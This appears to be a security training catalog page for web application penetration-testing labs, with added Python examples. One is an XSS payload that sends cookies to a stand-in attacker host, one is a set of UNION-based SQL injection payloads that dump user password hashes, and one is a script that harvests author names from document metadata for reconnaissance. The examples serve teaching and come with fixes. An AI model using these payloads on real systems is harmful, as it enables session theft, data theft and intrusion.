Web-based applications are the most significant security exposure your organization faces.

Labs in this category focus on detecting and understanding vulnerabilities in your web-based applications—penetration testing for the web. These vulnerabilities can be the result of risky coding practices, configuration problems, or newly-discovered vulnerabilities in supporting software or frameworks. These labs utilize multiple tools to examine web application servers using a "black box" approach, without access to source code.

Questions about which lab is right for you? Contact info@cyrintraining.com.

Students will use OWASP's Zed Attack Proxy (ZAP) tool suite from within Kali Linux to scan multiple web services and document vulnerabilities. Students will see ZAP in action against a vulnerable web site whose entire database tables are exposed to potential attackers.

Prerequisites

Basic web application knowledge (HTTP, URL parameters, etc.), networking concepts (TCP/IP, DNS, etc.), and familiarity with the Unix/Linux command line.

Expected Duration

2 hours, self-paced. Pause and continue at any time.
2 CPEs awarded on successful completion.

Cost

Free trial available (30 days)!

Included if you are a subscriber to any of the following training packages:

  • Level 1: CYRIN Enterprise Instructional Labs
  • Level 2: Attack/Defense/IR Exercises and Instructional Labs
  • Level 3: Attack Scenarios, Attack/Defense/IR Exercises, and Instructional Labs
  • Web Application Security Analysis Package
  • Introduction to Cybersecurity Lab Package
  • Secure Software Assessor
  • Cyber Defense Analyst 1
  • Cyber Operator 1
  • Vulnerability Assessment Analyst 1
  • Target Developer 1
  • Systems Security Analyst 1
  • Security Architect
  • Authorizing Official/Designating Representative
  • Exploitation Analysis 1 NICE Specialty Area Package
  • Vulnerability Assessment and Management NICE Specialty Area Package
  • Intrusion Detection and Prevention Lab Package
Educational Lab

Students will use the Nikto tool to test web services over the network and document vulnerabilities. Students will then use network packet capture tools such as Wireshark to verify their understanding of the vulnerabilities and testing procedures.

Prerequisites

Basic web application knowledge (HTTP, URL parameters, etc.), networking concepts (TCP/IP, DNS, etc.), and familiarity with the Unix/Linux command line.

Expected Duration

2 hours, self-paced. Pause and continue at any time.
2 CPEs awarded on successful completion.

Availability

Included if you are a subscriber to any of the following training packages:

  • Level 1: CYRIN Enterprise Instructional Labs
  • Level 2: Attack/Defense/IR Exercises and Instructional Labs
  • Level 3: Attack Scenarios, Attack/Defense/IR Exercises, and Instructional Labs
  • Web Application Security Analysis Package
  • Cyber Operator 2
  • Vulnerability Assessment Analyst 2
  • Target Developer 2
  • Systems Security Analyst 2
  • Security Architect
  • Exploitation Analysis 1 NICE Specialty Area Package
Educational Lab

Students will use the Vega scanning tool, within a graphical Kali Linux environment, to test web services over the network and document vulnerabilities. Students will then use network packet capture tools such as Wireshark to verify their understanding of the vulnerabilities and testing procedures.

Prerequisites

Basic web application knowledge (HTTP, URL parameters, etc.) and networking concepts (TCP/IP, DNS, etc.).

Expected Duration

2 hours, self-paced. Pause and continue at any time.
2 CPEs awarded on successful completion.

Availability

Included if you are a subscriber to any of the following training packages:

  • Level 1: CYRIN Enterprise Instructional Labs
  • Level 2: Attack/Defense/IR Exercises and Instructional Labs
  • Level 3: Attack Scenarios, Attack/Defense/IR Exercises, and Instructional Labs
  • Web Application Security Analysis Package
  • Secure Software Assessor
  • Cyber Operator 2
  • Vulnerability Assessment Analyst 1
  • Target Developer 1
  • Systems Security Analyst 1
  • Authorizing Official/Designating Representative
  • Exploitation Analysis 1 NICE Specialty Area Package
Educational Lab

Burp Suite is an industry standard suite of tools used by information security professionals for testing Web application security. Its tools work together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Students learn to use Burp tools to find security vulnerabilities in a web application. They will discover the application is vulnerable to cross-site scripting (XSS) attacks and will learn how to exploit the vulnerability to steal user credentials.
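The reflected cross-site scripting pattern the lab exploits, shown as an added example rather than code from the lab or from Burp Suite: a search page that reflects the query unescaped, the same page with the query HTML-escaped, and a payload that ships the victim's cookies to an attacker-controlled host. The page markup, the hostname attacker.invalid and the assumption that the credential being stolen is a session cookie are all constructed for this example.

```python
import html

# Constructed exfiltration payload: a reflected script that sends the victim's cookies,
# session token included, to a host the attacker controls (placeholder hostname).
EXFIL_PAYLOAD = (
    "<script>new Image().src="
    "'http://attacker.invalid/c?'+encodeURIComponent(document.cookie)</script>"
)

# Constructed attribute-context payload: breaks out of value="..." without a <script> tag.
ATTR_PAYLOAD = '" onmouseover="alert(1)'


def render_vulnerable(query):
    """Hypothetical search page: reflects the term into the body and into an attribute."""
    return (
        "<h2>Results for: " + query + "</h2>\n"
        '<input name="q" value="' + query + '">'
    )


def render_safe(query):
    """Same page with the term HTML-escaped for both contexts. quote=True also escapes
    the quote characters, which is what stops the attribute-breakout payload."""
    safe = html.escape(query, quote=True)
    return (
        "<h2>Results for: " + safe + "</h2>\n"
        '<input name="q" value="' + safe + '">'
    )


def contains_live_script(page):
    """Crude comparison aid: does the markup still contain an unescaped <script> tag?"""
    return "<script>" in page.lower()


def contains_attribute_breakout(page):
    """Crude comparison aid: did the payload land as a real event-handler attribute?"""
    return 'onmouseover="alert(1)"' in page


def session_cookie_header(token):
    """Defence in depth: HttpOnly hides the session cookie from document.cookie, so even a
    successful reflection cannot exfiltrate it the way EXFIL_PAYLOAD tries to."""
    return f"Set-Cookie: session={token}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    print("vulnerable:\n" + render_vulnerable(EXFIL_PAYLOAD))
    print("\nhardened:\n" + render_safe(EXFIL_PAYLOAD))
    print("\n" + session_cookie_header("deadbeef"))
```

Escaping on output is the fix for the reflection itself; the HttpOnly flag does not remove the XSS, it only limits what a successful payload can read, so both belong in the report.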

Prerequisites

Basic web application knowledge (HTTP, URL parameters, etc.).

Expected Duration

2 hours, self-paced. Pause and continue at any time.
2 CPEs awarded on successful completion.

Availability

Included if you are a subscriber to any of the following training packages:

  • Level 1: CYRIN Enterprise Instructional Labs
  • Level 2: Attack/Defense/IR Exercises and Instructional Labs
  • Level 3: Attack Scenarios, Attack/Defense/IR Exercises, and Instructional Labs
  • Web Application Security Analysis Package
  • Secure Software Assessor
  • Cyber Defense Analyst 2
  • Cyber Operator 2
  • Vulnerability Assessment Analyst 2
  • Target Developer 2
  • Systems Security Analyst 2
  • Security Architect
  • Authorizing Official/Designating Representative
  • Vulnerability Assessment and Management NICE Specialty Area Package
  • Exploitation Analysis 1 NICE Specialty Area Package
Educational Lab

Students will learn how to detect and exploit SQL injection vulnerabilities. Using several SQL injection techniques, students will gather information about a remote database, such as the server operating system, database type, table names and, most importantly, table contents. Students will then use sqlmap, an open-source SQL injection tool, to automate this process.
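The enumeration sequence described above (fingerprint the engine, list the tables, dump their contents), as an added example that is not the lab's own material or sqlmap's code. It uses an in-memory SQLite database constructed for the example; the search endpoint, table names and credentials are hypothetical. SQLite's sqlite_version() and sqlite_master play the role that version functions and information_schema views play on other engines, and the vulnerable function sits beside its parameterized fix so the payloads can be run against both.

```python
import sqlite3


def build_db():
    """Constructed sample database (not the lab's target): a product catalog plus a
    users table that the search feature was never meant to expose."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO products (name, price) VALUES ('widget', 9.99), ('gadget', 19.99);
        INSERT INTO users (username, password_hash)
            VALUES ('alice', '5f4dcc3b5aa765d61d8327deb882cf99'),
                   ('bob',   'e10adc3949ba59abbe56e057f20f883e');
    """)
    return conn


def search_vulnerable(conn, term):
    """Hypothetical search endpoint: the user-supplied term is spliced into the SQL text."""
    sql = f"SELECT name, price FROM products WHERE name = '{term}'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, term):
    """The fix: the term is bound as a parameter and can never change the query's shape."""
    return conn.execute(
        "SELECT name, price FROM products WHERE name = ?", (term,)
    ).fetchall()


# UNION-based payloads. The original SELECT returns two columns, so each payload
# supplies two; the trailing -- comments out the closing quote the endpoint appends.
# ORDER BY 1 makes the row order deterministic.
FINGERPRINT_PAYLOAD = "' UNION SELECT sqlite_version(), NULL--"
TABLES_PAYLOAD = (
    "' UNION SELECT name, sql FROM sqlite_master WHERE type='table' ORDER BY 1--"
)
DUMP_USERS_PAYLOAD = "' UNION SELECT username, password_hash FROM users ORDER BY 1--"


def enumerate_via_injection(conn):
    """The three steps the lab walks through by hand and sqlmap automates:
    fingerprint the engine, list the tables, then dump a table's contents."""
    version = search_vulnerable(conn, FINGERPRINT_PAYLOAD)[0][0]
    tables = [name for name, _ddl in search_vulnerable(conn, TABLES_PAYLOAD)]
    users = search_vulnerable(conn, DUMP_USERS_PAYLOAD)
    return {"version": version, "tables": tables, "users": users}


if __name__ == "__main__":
    db = build_db()
    for key, value in enumerate_via_injection(db).items():
        print(f"{key}: {value}")
    # The parameterized endpoint treats the payload as a product name and finds nothing.
    print("hardened:", search_parameterized(db, DUMP_USERS_PAYLOAD))
```

The column-count and comment-terminator details are what sqlmap works out for you automatically; doing them by hand once is what makes its output readable later.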

Prerequisites

Basic knowledge of SQL database queries and familiarity with the Unix/Linux command line.

Expected Duration

2 hours, self-paced. Pause and continue at any time.
2 CPEs awarded on successful completion.

Availability

Included if you are a subscriber to any of the following training packages:

  • Level 1: CYRIN Enterprise Instructional Labs
  • Level 2: Attack/Defense/IR Exercises and Instructional Labs
  • Level 3: Attack Scenarios, Attack/Defense/IR Exercises, and Instructional Labs
  • Web Application Security Analysis Package
  • Secure Software Assessor
  • Cyber Defense Analyst 2
  • Cyber Operator 2
  • Vulnerability Assessment Analyst 2
  • Target Developer 2
  • Systems Security Analyst 2
  • Security Architect
  • Authorizing Official/Designating Representative
  • Vulnerability Assessment and Management NICE Specialty Area Package
  • Exploitation Analysis 2 NICE Specialty Area Package
Educational Lab

Web site reconnaissance is the gathering of information about a web site. Some of that information is published on the site and intended for people to see. Other information, such as the name and version of the software running the site and details of the databases behind its web applications, is something the site owner may not want known, but it can be discovered using the techniques covered by CYRIN labs in the Network Monitoring and Recon and Web Application Security Analysis categories.

In this lab students will learn to extract additional information from documents hosted on the web site. Each such document carries metadata: information attached to the file that is not visible when the document is viewed. For example, the metadata of a Microsoft Word document includes its creation time and the name of the person who created it, which is very likely information not intended to be public.

Tools used in this lab include FOCA, wget and ExifTool.
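What FOCA and ExifTool read out of a Word document, as an added example that is not the lab's material or either tool's code: a .docx is a ZIP archive whose docProps/core.xml and docProps/app.xml parts hold the author, last editor, timestamps, application and company. The document below is constructed in memory for the example (only the two metadata parts are included), and every name, date and company value in it is invented.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# XML namespaces used by the two metadata parts of an Office Open XML package.
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}

# Result key -> (package part, element tag in Clark notation).
FIELDS = {
    "title": ("docProps/core.xml", "{%(dc)s}title" % NS),
    "creator": ("docProps/core.xml", "{%(dc)s}creator" % NS),
    "last_modified_by": ("docProps/core.xml", "{%(cp)s}lastModifiedBy" % NS),
    "created": ("docProps/core.xml", "{%(dcterms)s}created" % NS),
    "modified": ("docProps/core.xml", "{%(dcterms)s}modified" % NS),
    "application": ("docProps/app.xml", "{%(ep)s}Application" % NS),
    "company": ("docProps/app.xml", "{%(ep)s}Company" % NS),
}


def build_sample_docx(include_app=True):
    """Constructed stand-in for a document downloaded from the target site. Only the
    metadata parts are written; all values are invented for this example."""
    core = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<cp:coreProperties xmlns:cp="%(cp)s" xmlns:dc="%(dc)s" xmlns:dcterms="%(dcterms)s" '
        'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
        "<dc:title>Q3 Budget</dc:title>"
        "<dc:creator>jdoe</dc:creator>"
        "<cp:lastModifiedBy>Jane Doe</cp:lastModifiedBy>"
        '<dcterms:created xsi:type="dcterms:W3CDTF">2021-03-04T09:15:00Z</dcterms:created>'
        '<dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-09T16:42:00Z</dcterms:modified>'
        "</cp:coreProperties>"
    ) % NS
    app = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Properties xmlns="%(ep)s">'
        "<Application>Microsoft Office Word</Application>"
        "<AppVersion>16.0000</AppVersion>"
        "<Company>Example Corp</Company>"
        "</Properties>"
    ) % NS
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("docProps/core.xml", core)
        if include_app:
            zf.writestr("docProps/app.xml", app)
    return buf.getvalue()


def extract_docx_metadata(docx_bytes):
    """Return the metadata fields of interest; a missing part or element yields None."""
    parsed = {}
    found = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for key, (part, tag) in FIELDS.items():
            if part not in parsed:
                try:
                    parsed[part] = ET.fromstring(zf.read(part))
                except KeyError:  # this package has no such part
                    parsed[part] = None
            root = parsed[part]
            element = root.find(tag) if root is not None else None
            found[key] = element.text if element is not None else None
    return found


def candidate_identities(metadata):
    """The recon pivot: author and last-editor names become candidate usernames."""
    names = set()
    for key in ("creator", "last_modified_by"):
        if metadata.get(key):
            names.add(metadata[key])
    return sorted(names)


if __name__ == "__main__":
    meta = extract_docx_metadata(build_sample_docx())
    for key, value in meta.items():
        print(f"{key}: {value}")
    print("identities:", candidate_identities(meta))
```

Run over a directory fetched with wget, the creator and lastModifiedBy values across all documents give a username list and naming convention; the created and modified timestamps plus the application version give a picture of the desktop fleet. None of that is visible when the documents are opened normally.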

Prerequisites

Basic web application knowledge (HTTP, URL parameters, etc.) and familiarity with the Windows command prompt.

Expected Duration

2 hours, self-paced. Pause and continue at any time.
2 CPEs awarded on successful completion.

Availability

Included if you are a subscriber to any of the following training packages:

  • Level 1: CYRIN Enterprise Instructional Labs
  • Level 2: Attack/Defense/IR Exercises and Instructional Labs
  • Level 3: Attack Scenarios, Attack/Defense/IR Exercises, and Instructional Labs
  • Web Application Security Analysis Package
  • Cyber Defense Analyst 2
  • Cyber Operator 1
  • Vulnerability Assessment Analyst 2
  • Target Developer 2
  • Vulnerability Assessment and Management NICE Specialty Area Package
  • Exploitation Analysis 2 NICE Specialty Area Package
Educational Lab